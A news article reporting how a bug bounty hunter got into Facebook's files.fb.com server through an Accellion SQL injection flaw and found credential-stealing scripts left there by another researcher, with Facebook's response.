A bug bounty hunter compromises a Facebook staff server through a sloppy file-sharing webapp – and finds someone's already beaten him to it by backdooring the machine.
The pseudo-anonymous penetration tester Orange Tsai, who works for Taiwan-based outfit Devcore, banked $10,000 from Facebook in February for successfully drilling into the vulnerable system.
In a writeup published this week describing how the Linux server was infiltrated, Orange reveals how he or she stumbled across malware installed by someone else that was stealing usernames and passwords of FB employees who logged into the machine. The login credentials were siphoned off to an outside computer.
It's understood no Facebook user information was compromised.
Here's how it went down:
- With some Googling and poking around IP address ranges belonging to Facebook, Orange discovers that files.fb.com exists.
- The website is running Accellion’s web-based Secure File Transfer service.
- This webapp previously suffered a remote-code execution bug, so Orange looks for similar flaws in the software.
- Orange finds, among other bugs, a pre-authentication SQL injection vulnerability that can be exploited to achieve remote code execution. Accellion has since patched four holes – CVE-2016-2350 to CVE-2016-2353 – reported privately by Orange.
- Having exploited the classic SQL injection bug to install a webshell and gain control of the box, Orange discovers PHP scripts that intercept Facebook employees' usernames and passwords submitted to the files.fb.com site – credentials which could be used to access other parts of Facebook or be exploited in someway by a creative miscreant.
- The malicious scripts were used sometime in July and September last year.
- It also turns out the server had a *.fb.com wildcard SSL certificate installed on it. Misusing it would trip Facebook's cert logs, though.
According to Facebook security engineer Reginaldo Silva, the password-slurping malware was installed by another security researcher who had earlier poked around within Facebook's system in an attempt to snag a bug bounty.
"We're really glad Orange reported this to us. In this case, the software we were using is third party. As we don't have full control of it, we ran it isolated from the systems that host the data people share on Facebook. We do this precisely to have better security," said Silva.
"We determined that the activity Orange detected was in fact from another researcher who participates in our bounty program. Neither of them were able to compromise other parts of our infrastructure, so the way we see it, it's a double win: two competent researchers assessed the system, one of them reported what he found to us and got a good bounty, none of them were able to escalate access." ®